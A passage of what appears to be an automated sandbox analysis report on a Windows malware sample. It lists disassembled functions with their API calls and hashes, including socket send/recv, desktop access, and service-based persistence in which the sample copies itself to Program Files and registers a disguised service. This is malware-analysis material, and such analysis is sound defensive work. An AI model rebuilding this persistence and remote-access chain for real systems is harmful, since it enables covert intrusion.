                                                                    • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 92035984-0
                                                                    • Opcode ID: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction ID: 15c26be9302d7139859681cd7532fc677a9d9e28b366fa9b608ad3a6ccdbccd6
                                                                    • Opcode Fuzzy Hash: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction Fuzzy Hash: EFF0A4B290022DBFEF01DFA8CD45CEE7BB9EB09251B004565FD21E2265E7318A209B90
                                                                    Function 10001B29 Relevance: 4.6, APIs: 3, Instructions: 72networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001B7F
                                                                    • memset.MSVCRT ref: 10001B97
                                                                    • recv.WS2_32(?,?,00019000,00000000), ref: 10001BAE
                                                                      • Part of subcall function 10001C0D: __EH_prolog.LIBCMT ref: 10001C12
                                                                      • Part of subcall function 10001C0D: memcmp.MSVCRT(?,?,00000006,00000000,00000000,00019000), ref: 10001C3F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prologmemcmpmemsetrecvselect
                                                                    • String ID:
                                                                    • API String ID: 845096623-0
                                                                    • Opcode ID: 9de728bd16ee88078f1147b8d96536cc58b4422340208934578f64e372f65737
                                                                    • Instruction ID: afa39f8f22a2e65889c4d3b7fb3bc88bafb1cfa927511703f4baee0bbc662a7f
                                                                    • Opcode Fuzzy Hash: 9de728bd16ee88078f1147b8d96536cc58b4422340208934578f64e372f65737
                                                                    • Instruction Fuzzy Hash: 3321A576500128ABEB10CB58DC84ECF7BACEF453E0F000555F91997195E771EEC5CAA0
                                                                    Function 10001F89 Relevance: 4.6, APIs: 3, Instructions: 67networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • send.WS2_32(?,00000000,00000006,00000000), ref: 10001FC6
                                                                    • Sleep.KERNEL32(0000000A,?,10001F82,00000000,00000000,00000000,00019000,?,00000006,?), ref: 10001FE3
                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 10002003
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: send$Sleep
                                                                    • String ID:
                                                                    • API String ID: 3329562092-0
                                                                    • Opcode ID: 77ba07aa8f325cd2edcfd63baab4ab120039e9619fbfab7e8c15a43e49c5f85f
                                                                    • Instruction ID: 7c7494472e437d7760c5a295741750c72d939f712f423e24f447c23a6713e152
                                                                    • Opcode Fuzzy Hash: 77ba07aa8f325cd2edcfd63baab4ab120039e9619fbfab7e8c15a43e49c5f85f
                                                                    • Instruction Fuzzy Hash: E4214D7290031AEFEB00CF95CC85ADD7BA4FB043A5F20812AFA1596056D7B0AE91DB90
                                                                    Function 10009FEF Relevance: 4.5, APIs: 3, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10009FF4
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 1000A013
                                                                    • SetEvent.KERNEL32(?), ref: 1000A01E
                                                                      • Part of subcall function 1000A1AC: LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_0000AF24,1000D460,000000FF,?,1000A02F,00000000), ref: 1000A1D4
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 1000A1E9
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 1000A1F5
                                                                      • Part of subcall function 1000A1AC: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 1000A201
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$EventH_prologLibraryLoadmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1665906595-0
                                                                    • Opcode ID: 4924b9432ba05327cefe2ae31b936a73d278707eeb355b2f5176c0674f4179f0
                                                                    • Instruction ID: bf1320978b60b16f40b87c5a594d34147c3bdbcbe467daf5d5d66b68f1dcd34b
                                                                    • Opcode Fuzzy Hash: 4924b9432ba05327cefe2ae31b936a73d278707eeb355b2f5176c0674f4179f0
                                                                    • Instruction Fuzzy Hash: 1CF06DB6D0120DAFEF00EFA8C945ADEBFF8EF0A290F10012AE401B2215D7355E40DAA1
                                                                    Function 10008E92 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,75A78400,100098BA), ref: 10008EAD
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,75A78400,100098BA), ref: 10008EB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleObjectSingleWait$CreateEvent_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 1089044457-0
                                                                    • Opcode ID: ae333e3efa1cf9964cf5906c6c1fafbad2d9c37fdd142fb7b8b31cbaaaf885bc
                                                                    • Instruction ID: d6efba61a8d1c30af2bcfb7405c55962e4b0b5b2fefc3c8facbf6a0ab16d7444
                                                                    • Opcode Fuzzy Hash: ae333e3efa1cf9964cf5906c6c1fafbad2d9c37fdd142fb7b8b31cbaaaf885bc
                                                                    • Instruction Fuzzy Hash: 3DD012F28096347EF61067742C49DFB350CDB032F1B150751FD11D51D9EA140D8146B5
                                                                    Function 10007105 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,10007D67,?), ref: 1000710F
                                                                    • wsprintfA.USER32 ref: 10007120
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2452939696-0
                                                                    • Opcode ID: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction ID: c03d28a1dd34d89bbcc1f663290b6a9b283fe8bb38574ef75e147567b18b88f0
                                                                    • Opcode Fuzzy Hash: 4dbd100e9400942c41e5e1807255a7e2b7a0e37f64c6861b15b4953b4d121d95
                                                                    • Instruction Fuzzy Hash: E6D0127180021CFBCF01EBE4DD49CCD7BB9BB08288B004460FA06E1064D771E565DBD5
                                                                    Function 024BE1A1 Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506C7E,000000FF,00000007,00000000,00000004,00000000,?,?,?,02506990,00000065,00000000,?,02505F25,FFFFFFE0,00000000), ref: 024BE1BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0c8d8a839ae5cab81025d682d6d5e8e18988fa8771bb9019b0ad9e76903669f1
                                                                    • Instruction ID: 001471c6a5005c000e777e79f9c09bc018a795e78da6206bc5d15fd1011742ee
                                                                    • Opcode Fuzzy Hash: 0c8d8a839ae5cab81025d682d6d5e8e18988fa8771bb9019b0ad9e76903669f1
                                                                    • Instruction Fuzzy Hash: 98B09B719018D5D5DA16E770460875779106BD0711F7AC052D1030655A8738C191F175
                                                                    Function 024BE367 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024D473A,00000000,76FA4F4C), ref: 024BE371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3311cdc1437dc7d57fc21bf6541892f70bad979a9ac821505f141b48a28c8ae1
                                                                    • Instruction ID: ba355d8e859d6816615315c8d49fa765a9c66f78f412bfb7516d1d93b4bf5fbd
                                                                    • Opcode Fuzzy Hash: 3311cdc1437dc7d57fc21bf6541892f70bad979a9ac821505f141b48a28c8ae1
                                                                    • Instruction Fuzzy Hash: 10900231242841E25945B1588404507400697E02417F6C012A1514954CC9269956E661
                                                                    Function 024BE067 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024FD1D8,?,00000000,00000000,00000000,?,?,00000004,00000030,00000000,?,00100001,?,?,00000005,00000060), ref: 024BE071
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 86276baadd0a6f8d7d7dbe651620013fe57213813097658a0b9f257221dea9ea
                                                                    • Instruction ID: 12c6cba3fdbbdc8eff8bfe0daf956e4397acb8111a748b58c9dd0c2ddeca9ea2
                                                                    • Opcode Fuzzy Hash: 86276baadd0a6f8d7d7dbe651620013fe57213813097658a0b9f257221dea9ea
                                                                    • Instruction Fuzzy Hash: 3E900235211800930505B5584704507004687D53513B6C021F1115554CDA2189616161
                                                                    Function 024BE0D7 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024DB20F,000000FE,00000005,?,00000004,000000FE,00000000,00000001), ref: 024BE0E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 89dbe6fee2a7d5bde55e6a9cebc87a549e6907b4d2d9fa4ed4478543ed452b88
                                                                    • Instruction ID: fd162d09187195704d1a5487c24e7ee05acbcbafa838542260557f549b872b82
                                                                    • Opcode Fuzzy Hash: 89dbe6fee2a7d5bde55e6a9cebc87a549e6907b4d2d9fa4ed4478543ed452b88
                                                                    • Instruction Fuzzy Hash: 9490023120180492D50071988404706000587D0201FB6C412E062455CDCA5589517571
                                                                    Function 024BF8D7 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02532162,?,00010007), ref: 024BF8E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: bda0a07a9d1d617d10003eecd002a9b528813f507aae15ff61f6aca5c8a7f0a7
                                                                    • Instruction ID: 17a9d86bda039369e1dc55716b4da23c424b6a74c85100243c277696fa841cd1
                                                                    • Opcode Fuzzy Hash: bda0a07a9d1d617d10003eecd002a9b528813f507aae15ff61f6aca5c8a7f0a7
                                                                    • Instruction Fuzzy Hash: B3900231605C00A2954071588884546400597E0301BB6C011E0524558CCE148A5663A1
                                                                    Function 024BE0F7 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(02506AF2,00000004,00000004,000F0007,C0000001,?,00000004,08000000,00000000,00000065,00000000,00000000,00000058), ref: 024BE101
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: dd1357673929edd627d5002cf9b22b1c21bc2a403287383c9e2e20cba39850d4
                                                                    • Instruction ID: a7c3278bab233e358864312cb0a9fac2fa44294094936769d81f40b09dbb6f4b
                                                                    • Opcode Fuzzy Hash: dd1357673929edd627d5002cf9b22b1c21bc2a403287383c9e2e20cba39850d4
                                                                    • Instruction Fuzzy Hash: AA90027120280093450571588414616400A87E0201BB6C021E1114594DC92589917165
                                                                    Function 024BE187 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(025068F4,000000FF,00000000,00000000,0000000C,00001000,00000004,76F8D260,0000001C,0250664D), ref: 024BE191
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 99d95164daa121e4aa1da014ad54696e11d4a89c828f981c5379f8b395cffda3
                                                                    • Instruction ID: f493f41ee4575846753655f81b4abaab26142dd9efb5aad95f225d96354de1fb
                                                                    • Opcode Fuzzy Hash: 99d95164daa121e4aa1da014ad54696e11d4a89c828f981c5379f8b395cffda3
                                                                    • Instruction Fuzzy Hash: 7290023120180892D5807158840464A000587D1301FF6C015A0125658DCE158B5977E1
                                                                    Function 024BE547 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(024BBB7A,?,00000000,00000001,00000000,00000000,00000000,?,?,?,?,00000000), ref: 024BE551
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9c108ca8da4b7945a0a9952683abbeebe51abec1548ac5c3ebd004b90cba5b90
                                                                    • Instruction ID: f1fbd36493b9b43dd1b27881c55b4b890ae4995d64617fcdfce7fc223b740b08
                                                                    • Opcode Fuzzy Hash: 9c108ca8da4b7945a0a9952683abbeebe51abec1548ac5c3ebd004b90cba5b90
                                                                    • Instruction Fuzzy Hash: CA900231601800D245407168C8449064005ABE12117B6C121A0A98554DC959896566A5
                                                                    Function 024BE577 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(0255589B,?,00100080,00000018,?,00000000,00000000,00000007,00000001,00000020,00000000,00000000,76EA5A68,00000000,?,?), ref: 024BE581
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8ac549f2867562ec1500e0e04f390b73ac4eeec54055744d4b505ee26b047c0a
                                                                    • Instruction ID: 52ea3a1bfe49ca4497603a7c7aeba830978ab11dc6f7cd3ffbc77b97a477a51e
                                                                    • Opcode Fuzzy Hash: 8ac549f2867562ec1500e0e04f390b73ac4eeec54055744d4b505ee26b047c0a
                                                                    • Instruction Fuzzy Hash: 93900231211C00D2D60075688C14B07000587D0303FB6C115A0254558CCD1589616561
                                                                    Function 1000104C Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000006,00000006,00000000,?,?,10001F51,?,00000006,759183C0,00000000,00000001,10007ED6,000000C8,0000022C), ref: 10001074
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 1d74ab25eef09fa5e914f7aba4110aa78311b1aed8e0b9673909ecef9a35eedd
                                                                    • Instruction ID: 3bb2addebcf3b707f2711ef3adc63796bd6daa7f6c2fdc3a60a37f8491615d67
                                                                    • Opcode Fuzzy Hash: 1d74ab25eef09fa5e914f7aba4110aa78311b1aed8e0b9673909ecef9a35eedd
                                                                    • Instruction Fuzzy Hash: 1DE0CD76B0434157D670D53ADC01CCFB695EFD16B07190E1EF1E1C2164DA70D8959161
                                                                    Function 0228DBFE Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc70f71115ca4e63ebceb1627cd6d81ce0ba7c14177427b63d3444ec175a054c
                                                                    • Instruction ID: d29198a90ec96f4f47b5249912550b2766468690260666e6b6ba3339667be135
                                                                    • Opcode Fuzzy Hash: bc70f71115ca4e63ebceb1627cd6d81ce0ba7c14177427b63d3444ec175a054c
                                                                    • Instruction Fuzzy Hash: C8D06C7704014DBBCF029E85EC05EDA3F2AEB58370F158601BE344A1A1C676D9B1ABA5

                                                                    Non-executed Functions

                                                                    Function 00410252 Relevance: 70.1, APIs: 2, Strings: 38, Instructions: 129stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(?), ref: 00410328
                                                                    • lstrlen.KERNEL32(?,00000000), ref: 004103CF
                                                                      • Part of subcall function 004128C6: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                      • Part of subcall function 004128C6: FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoadLocalTimelstrlen
                                                                    • String ID: %$%4d-%.2d-%.2d$C$C$E$M$MarkTime$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 3554365422-3486506000
                                                                    • Opcode ID: 4885db4e35c7ad0de6bf44cf329ec7e10b7e87afdc1050f6bb792091b0ccec24
                                                                    • Instruction ID: 0d3807ad2b1df906bf20e6dd931cde3bed11d0420b81c36ad911f3e7cfcfcc37
                                                                    • Opcode Fuzzy Hash: 4885db4e35c7ad0de6bf44cf329ec7e10b7e87afdc1050f6bb792091b0ccec24
                                                                    • Instruction Fuzzy Hash: F851F821C086CCEDEB12C7E8D8487DEBFB55B26349F0840D9E5847A282C6BE165CC776
                                                                    Function 10009A83 Relevance: 63.2, APIs: 28, Strings: 8, Instructions: 214stringserviceregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,Rsjshd fzfgkqcm,75A78400,00000000), ref: 10009AB9
                                                                    • ExpandEnvironmentStringsA.KERNEL32(%ProgramFiles%\,?,00000104), ref: 10009ACC
                                                                    • strlen.MSVCRT ref: 10009AD9
                                                                    • strncmp.MSVCRT ref: 10009AED
                                                                    • wsprintfA.USER32 ref: 10009B33
                                                                    • strlen.MSVCRT ref: 10009B40
                                                                    • strlen.MSVCRT ref: 10009B59
                                                                    • strcat.MSVCRT(?,10012A68), ref: 10009B72
                                                                    • strcat.MSVCRT(?,?,?,10012A68), ref: 10009B85
                                                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 10009B9C
                                                                    • memset.MSVCRT ref: 10009BB7
                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104,?), ref: 10009BCA
                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 10009BE1
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10009C03
                                                                    • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 10009C3C
                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 10009C49
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000001,Rsjshd fzfgkqcm), ref: 10009C6D
                                                                    • ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 10009CE8
                                                                    • UnlockServiceDatabase.ADVAPI32(?), ref: 10009CF4
                                                                    • GetLastError.KERNEL32 ref: 10009D02
                                                                    • OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 10009D1D
                                                                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10009D30
                                                                    • StartServiceA.ADVAPI32(?,00000000,00000000), ref: 10009D3E
                                                                    • strcpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services\), ref: 10009D54
                                                                    • strcat.MSVCRT(?,?,?,SYSTEM\CurrentControlSet\Services\), ref: 10009D63
                                                                      • Part of subcall function 10008B5E: strlen.MSVCRT ref: 10008B86
                                                                      • Part of subcall function 10008B5E: _access.MSVCRT ref: 10008BAD
                                                                      • Part of subcall function 10008B5E: CreateDirectoryA.KERNEL32(?,00000000), ref: 10008BC4
                                                                      • Part of subcall function 10008B5E: strlen.MSVCRT ref: 10008BCC
                                                                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 10009D7E
                                                                    • lstrlenA.KERNEL32(100097BD), ref: 10009D87
                                                                    • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,100097BD,00000000), ref: 10009D9E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
